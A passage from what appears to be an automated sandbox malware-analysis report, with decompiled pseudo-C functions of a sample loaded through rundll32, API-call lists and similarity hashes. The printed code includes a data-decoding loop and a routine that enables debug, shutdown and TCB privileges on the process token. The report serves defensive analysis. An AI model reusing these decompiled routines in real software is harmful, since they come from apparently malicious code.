                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                        				signed char _t40;
                                                                                                                                                                                        				signed int _t41;
                                                                                                                                                                                        				short _t50;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t50 = __eax;
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t39 = HeapAlloc(GetProcessHeap(), 8, 0x68);
                                                                                                                                                                                        				if(_t39 == 0) {
                                                                                                                                                                                        					L11:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t40 = 0;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t27 = _t40 & 0x000000ff;
                                                                                                                                                                                        					_t2 = _t27 + 0x7c3730; // 0xfcfffffa
                                                                                                                                                                                        					_t40 = _t40 + 1;
                                                                                                                                                                                        					 *(_t39 + _t27) =  !( *_t2);
                                                                                                                                                                                        				} while (_t40 < 0x68);
                                                                                                                                                                                        				_t28 = rand();
                                                                                                                                                                                        				 *(_t39 + 0x18) = _t28;
                                                                                                                                                                                        				 *((short*)(_t39 + 0x34)) = _t28 + _t50;
                                                                                                                                                                                        				if(E007B2F5A(_a4, _a8, _t50, 0, 0xff, 8, _t39, 0x68) != 0) {
                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                                        					if(E007B3071(_t40, _a4, _a8, _t50,  &_v16,  &_v12) != 0) {
                                                                                                                                                                                        						_t36 = _v16;
                                                                                                                                                                                        						if(_v12 == 0x70 &&  *((intOrPtr*)(_t36 + 0x50)) == 0x18 &&  *((intOrPtr*)(_t36 + 0x6c)) == 0) {
                                                                                                                                                                                        							_t41 = 5;
                                                                                                                                                                                        							_t36 = memcpy( *_a12, _t36 + 0x58, _t41 << 2);
                                                                                                                                                                                        							_v5 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _t36);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				HeapFree(GetProcessHeap(), 8, _t39);
                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000068,74654F20,?,77D74620,?,007B51F9,?,?,?), ref: 007B4F56
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,007B51F9,?,?,?), ref: 007B4F5D
                                                                                                                                                                                        • rand.MSVCRT ref: 007B4F86
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,007B51F9,?,00000000,?,007B51F9,007B51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 007B4FF7
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B4FFE
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,007B51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,007B51F9,?,?,?), ref: 007B5007
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,007B51F9,?,?,?), ref: 007B500E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Free$Allocrand
                                                                                                                                                                                        • String ID: Oet Uet0Xet$p
                                                                                                                                                                                        • API String ID: 2875874559-2104030822
                                                                                                                                                                                        • Opcode ID: 724031f972d314376903f10fc0585a2dee7e4ee95bcff99542ae3347fb86c16a
                                                                                                                                                                                        • Instruction ID: bf8614120629678e46a02ff253bf2ff84ad6ef7fff2906b49b6f9deb4c3b3395
                                                                                                                                                                                        • Opcode Fuzzy Hash: 724031f972d314376903f10fc0585a2dee7e4ee95bcff99542ae3347fb86c16a
                                                                                                                                                                                        • Instruction Fuzzy Hash: DC21E235900248BFDF21AFA48C89FEE7F79FF55315F048095F9009B192D6798949CBA1
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B69AE(void* _a4, void* _a8, intOrPtr _a12) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				intOrPtr* _t31;
                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                        				intOrPtr* _t38;
                                                                                                                                                                                        				intOrPtr* _t43;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				intOrPtr* _t51;
                                                                                                                                                                                        				long _t57;
                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                        				intOrPtr _t69;
                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t31 = _a4;
                                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        				_t61 =  *0x7c7b80;
                                                                                                                                                                                        				_t63 = _t31 + 2;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t67 =  *_t31;
                                                                                                                                                                                        					_t31 = _t31 + 2;
                                                                                                                                                                                        				} while (_t67 != 0);
                                                                                                                                                                                        				_t36 = HeapAlloc(GetProcessHeap(), 8, (_t31 - _t63 >> 1) + (_t31 - _t63 >> 1) + 2);
                                                                                                                                                                                        				_v16 = _t36;
                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                        					_t38 = _a4;
                                                                                                                                                                                        					_t68 = _t38 + 2;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t64 =  *_t38;
                                                                                                                                                                                        						_t38 = _t38 + 2;
                                                                                                                                                                                        					} while (_t64 != 0);
                                                                                                                                                                                        					memcpy(_v16, _a4, (_t38 - _t68 >> 1) + (_t38 - _t68 >> 1) + 2);
                                                                                                                                                                                        					_t43 = _a8;
                                                                                                                                                                                        					_t65 = _t43 + 2;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t69 =  *_t43;
                                                                                                                                                                                        						_t43 = _t43 + 2;
                                                                                                                                                                                        					} while (_t69 != 0);
                                                                                                                                                                                        					_t48 = HeapAlloc(GetProcessHeap(), 8, (_t43 - _t65 >> 1) + (_t43 - _t65 >> 1) + 2);
                                                                                                                                                                                        					_v12 = _t48;
                                                                                                                                                                                        					if(_t48 == 0) {
                                                                                                                                                                                        						L12:
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t51 = _a8;
                                                                                                                                                                                        						_t70 = _t51 + 2;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t66 =  *_t51;
                                                                                                                                                                                        							_t51 = _t51 + 2;
                                                                                                                                                                                        						} while (_t66 != 0);
                                                                                                                                                                                        						memcpy(_v12, _a8, (_t51 - _t70 >> 1) + (_t51 - _t70 >> 1) + 2);
                                                                                                                                                                                        						_t57 = E007B6E66(_t66, _t61,  &_v16, _a12);
                                                                                                                                                                                        						_v8 = _t57;
                                                                                                                                                                                        						if(_t57 == 0) {
                                                                                                                                                                                        							HeapFree(GetProcessHeap(), _t57, _v12);
                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                        			}























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,766384F0,00000000,00000000), ref: 007B69E3
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B69EC
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B6A19
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B6A3D
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B6A40
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B6A6F
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 007B6A8F
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B6A92
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007B6A99
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B6A9C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFreememcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3405790324-0
                                                                                                                                                                                        • Opcode ID: 5d5b482668fe812f6bcf55535e04ba6d4b41c01d238855afc262002f95897610
                                                                                                                                                                                        • Instruction ID: 5176ed76c2c3ac6f7706817d54c45109b69c47b0ea71e98a9a6fb0c9c572f2e6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d5b482668fe812f6bcf55535e04ba6d4b41c01d238855afc262002f95897610
                                                                                                                                                                                        • Instruction Fuzzy Hash: E931617690010AAFCF14AFA8CC45FEA7BB9EF54344F05C555EA04DB261E678EB14CB90
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B68B5(void* _a4, void* _a8) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                        				intOrPtr* _t53;
                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                        				intOrPtr _t70;
                                                                                                                                                                                        				intOrPtr _t71;
                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                                        				void* _t74;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        				_v12 =  *0x7c7b80;
                                                                                                                                                                                        				_t33 = _a4;
                                                                                                                                                                                        				_t67 = _t33 + 2;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t71 =  *_t33;
                                                                                                                                                                                        					_t33 = _t33 + 2;
                                                                                                                                                                                        				} while (_t71 != 0);
                                                                                                                                                                                        				_t38 = HeapAlloc(GetProcessHeap(), 8, (_t33 - _t67 >> 1) + (_t33 - _t67 >> 1) + 2);
                                                                                                                                                                                        				_v20 = _t38;
                                                                                                                                                                                        				if(_t38 != 0) {
                                                                                                                                                                                        					_t40 = _a4;
                                                                                                                                                                                        					_t72 = _t40 + 2;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t68 =  *_t40;
                                                                                                                                                                                        						_t40 = _t40 + 2;
                                                                                                                                                                                        					} while (_t68 != 0);
                                                                                                                                                                                        					memcpy(_v20, _a4, (_t40 - _t72 >> 1) + (_t40 - _t72 >> 1) + 2);
                                                                                                                                                                                        					_t45 = _a8;
                                                                                                                                                                                        					_t69 = _t45 + 2;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t73 =  *_t45;
                                                                                                                                                                                        						_t45 = _t45 + 2;
                                                                                                                                                                                        					} while (_t73 != 0);
                                                                                                                                                                                        					_t50 = HeapAlloc(GetProcessHeap(), 8, (_t45 - _t69 >> 1) + (_t45 - _t69 >> 1) + 2);
                                                                                                                                                                                        					_v16 = _t50;
                                                                                                                                                                                        					if(_t50 != 0) {
                                                                                                                                                                                        						_t53 = _a8;
                                                                                                                                                                                        						_t74 = _t53 + 2;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t70 =  *_t53;
                                                                                                                                                                                        							_t53 = _t53 + 2;
                                                                                                                                                                                        						} while (_t70 != 0);
                                                                                                                                                                                        						memcpy(_v16, _a8, (_t53 - _t74 >> 1) + (_t53 - _t74 >> 1) + 2);
                                                                                                                                                                                        						_v8 = E007B6E1B(_v12, 0, _t70,  &_v20);
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 0, _v20);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                        			}


                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,76B5C0B0,00000000), ref: 007B68EB
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B68F4
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B6921
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,74654D40), ref: 007B6946
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B6949
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B6978
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?), ref: 007B6995
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B6998
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007B699F
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B69A2
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFreememcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3405790324-0
                                                                                                                                                                                        • Opcode ID: 2d934a14b6f07713c0c750ca3dd1c58ecf634997ba3b76a832f66d23e816ff3a
                                                                                                                                                                                        • Instruction ID: dfed990b6f377c0a6e9a9cca5c2ceefb1463bca758e669fb392ff18d775b6625
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d934a14b6f07713c0c750ca3dd1c58ecf634997ba3b76a832f66d23e816ff3a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 74315E7590010AAFCB14EFA8CC46EEFBBB9FF48344F058555EA44CB251E678EA14CB90
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B6735(WCHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                        				short _v2052;
                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                        				intOrPtr* _t13;
                                                                                                                                                                                        				WCHAR* _t16;
                                                                                                                                                                                        				WCHAR* _t22;
                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                        				short _t30;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        				short* _t34;
                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t10 = E007B6477();
                                                                                                                                                                                        				if(_t10 < 0xf) {
                                                                                                                                                                                        					_t10 = 0xf;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				wsprintfW( &_v2052, L"%d", _t10);
                                                                                                                                                                                        				_t13 =  &_v2052;
                                                                                                                                                                                        				_t33 = _t13 + 2;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t29 =  *_t13;
                                                                                                                                                                                        					_t13 = _t13 + 2;
                                                                                                                                                                                        				} while (_t29 != 0);
                                                                                                                                                                                        				_t39 = _t13 - _t33 >> 1;
                                                                                                                                                                                        				EnterCriticalSection(0x7c7b9c);
                                                                                                                                                                                        				_t46 =  *0x7c3010;
                                                                                                                                                                                        				if( *0x7c3010 != 0) {
                                                                                                                                                                                        					E007B6628(_t29, _t46);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t16 = 0x7c3b90;
                                                                                                                                                                                        				_t4 =  &(_t16[1]); // 0x7c3b92
                                                                                                                                                                                        				_t34 = _t4;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t30 =  *_t16;
                                                                                                                                                                                        					_t16 =  &(_t16[1]);
                                                                                                                                                                                        				} while (_t30 != 0);
                                                                                                                                                                                        				_t36 = (_t16 - _t34 >> 1) + _t39;
                                                                                                                                                                                        				if(_t36 >= _a8 - 1) {
                                                                                                                                                                                        					SetLastError(0x7a);
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t22 = _a4;
                                                                                                                                                                                        					 *_t22 = 0;
                                                                                                                                                                                        					StrCatW(_t22,  &_v2052);
                                                                                                                                                                                        					StrCatW(_a4, 0x7c3b90);
                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				LeaveCriticalSection(0x7c7b9c);
                                                                                                                                                                                        				return _t39;
                                                                                                                                                                                        			}















                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 007B6477: GetTickCount.KERNEL32 ref: 007B6477
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B6758
                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(007C7B9C,?,00000000,00000000), ref: 007B6783
                                                                                                                                                                                        • StrCatW.SHLWAPI(?,?), ref: 007B67D1
                                                                                                                                                                                        • StrCatW.SHLWAPI(?,007C3B90), ref: 007B67D7
                                                                                                                                                                                        • SetLastError.KERNEL32(0000007A), ref: 007B67DF
                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(007C7B9C), ref: 007B67EA
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CriticalSection$CountEnterErrorLastLeaveTickwsprintf
                                                                                                                                                                                        • String ID: pGdv0Hcv
                                                                                                                                                                                        • API String ID: 230659905-3560805785
                                                                                                                                                                                        • Opcode ID: 49775964934f3bdc076f4a256021dca2ea6f2b145c10c69349f6872a9bd8d6fb
                                                                                                                                                                                        • Instruction ID: 4af242d1ef183825a737a012d6a2583e4f3c29bdd6d5fd07cbadaf4889794937
                                                                                                                                                                                        • Opcode Fuzzy Hash: 49775964934f3bdc076f4a256021dca2ea6f2b145c10c69349f6872a9bd8d6fb
                                                                                                                                                                                        • Instruction Fuzzy Hash: B311D3726001099BCB206B68DC49FEA37A9FF44344F058965F646DB190FABCEE04CB94
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                        			E007B7897(void* __ecx, void* __esi) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				long _t3;
                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                        				signed int _t18;
                                                                                                                                                                                        
                                                                                                                                                                                        				if( *0x7c7b8c == 0) {
                                                                                                                                                                                        					srand(GetTickCount());
                                                                                                                                                                                        					_pop(_t15);
                                                                                                                                                                                        					 *0x7c7b90 = GetTickCount();
                                                                                                                                                                                        					_t18 = 0;
                                                                                                                                                                                        					if(E007B7CC5(L"SeShutdownPrivilege") != 0) {
                                                                                                                                                                                        						_t18 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(E007B7CC5(L"SeDebugPrivilege") != 0) {
                                                                                                                                                                                        						_t18 = _t18 | 0x00000002;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(E007B7CC5(L"SeTcbPrivilege") != 0) {
                                                                                                                                                                                        						_t18 = _t18 | 0x00000004;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *0x7c7bc0 = _t18;
                                                                                                                                                                                        					 *0x7c7b7c = E007B855F();
                                                                                                                                                                                        					E007B554A(_t15,  &_v8, 4);
                                                                                                                                                                                        					 *0x7c7bbc = _v8;
                                                                                                                                                                                        					_t3 = GetModuleFileNameW( *0x7c7b98, 0x7c7bc8, 0x30c);
                                                                                                                                                                                        					if(_t3 != 0) {
                                                                                                                                                                                        						return E007B8832();
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t3;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 007B78AF
                                                                                                                                                                                        • srand.MSVCRT ref: 007B78B2
                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 007B78B9
                                                                                                                                                                                          • Part of subcall function 007B7CC5: GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,007B79E8), ref: 007B7CE9
                                                                                                                                                                                          • Part of subcall function 007B7CC5: OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,007B79E8), ref: 007B7CF0
                                                                                                                                                                                          • Part of subcall function 007B7CC5: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007B7D02
                                                                                                                                                                                          • Part of subcall function 007B7CC5: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007B7D25
                                                                                                                                                                                          • Part of subcall function 007B7CC5: GetLastError.KERNEL32(?,00000000), ref: 007B7D2D
                                                                                                                                                                                          • Part of subcall function 007B7CC5: SetLastError.KERNEL32(?,?,00000000,?,?,?,007B79E8), ref: 007B7D3F
                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(007C7BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B7926
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CountErrorLastProcessTickToken$AdjustCurrentFileLookupModuleNameOpenPrivilegePrivilegesValuesrand
                                                                                                                                                                                        • String ID: SeDebugPrivilege$SeShutdownPrivilege$SeTcbPrivilege
                                                                                                                                                                                        • API String ID: 1536163209-50072501
                                                                                                                                                                                        • Opcode ID: 8ed9fd3e64c6ebbf91e0eb15148c34c66f4ac0e0b6e59704849a214a892be52f
                                                                                                                                                                                        • Instruction ID: 9abf06928d61d0b4e83561f04703493f4818062cd9469fd8125e04171a907af7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ed9fd3e64c6ebbf91e0eb15148c34c66f4ac0e0b6e59704849a214a892be52f
                                                                                                                                                                                        • Instruction Fuzzy Hash: F80112B1908214D6D728AF759C0AF8A3F6DAB44750B55816DE80196191DF7CDD00CFA5
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                        			E007B50A2(void* __ecx, intOrPtr _a4, void* _a8, short _a12, signed int _a16) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                        				short _t27;
                                                                                                                                                                                        				short _t28;
                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                        				long _t47;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(0x34);
                                                                                                                                                                                        				_t47 = 8;
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t25 = HeapAlloc(GetProcessHeap(), _t47, ??);
                                                                                                                                                                                        				_t39 = _t25;
                                                                                                                                                                                        				if(_t39 == 0) {
                                                                                                                                                                                        					L7:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					 *_t25 =  !( *(0x7c3730 + _t25));
                                                                                                                                                                                        					_t25 = _t25 + 1;
                                                                                                                                                                                        					_t47 = _t47 - 1;
                                                                                                                                                                                        				} while (_t47 != 0);
                                                                                                                                                                                        				_t27 = 0x34;
                                                                                                                                                                                        				 *((short*)(_t39 + 8)) = _t27;
                                                                                                                                                                                        				_t28 = 0x13;
                                                                                                                                                                                        				_t44 = 5;
                                                                                                                                                                                        				 *((intOrPtr*)(_t39 + 0xc)) = 3;
                                                                                                                                                                                        				 *((short*)(_t39 + 0x16)) = _t28;
                                                                                                                                                                                        				_t10 = _t39 + 0x18; // 0x18
                                                                                                                                                                                        				memcpy(_t10, _a16, _t44 << 2);
                                                                                                                                                                                        				if(E007B2F5A(_a4, _a8, _a12, 0, 0xff, 8, _t39, 0x34) != 0) {
                                                                                                                                                                                        					_v12 = _v12 & 0x00000000;
                                                                                                                                                                                        					_a16 = _a16 & 0x00000000;
                                                                                                                                                                                        					if(E007B3071(0, _a4, _a8, _a12,  &_a16,  &_v12) != 0) {
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _a16);
                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				HeapFree(GetProcessHeap(), 8, _t39);
                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                        			}












                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000034,74654F20,00000000,?,?,?,007B52FD,?,?,?,?,?,?,?,00000000), ref: 007B50B3
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B52FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 007B50BA
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,77794DB0), ref: 007B5148
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B52FD,?,?,?,?,?,?,?,00000000,00000000), ref: 007B514F
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,77794DB0,?,?,?,007B52FD,?), ref: 007B5158
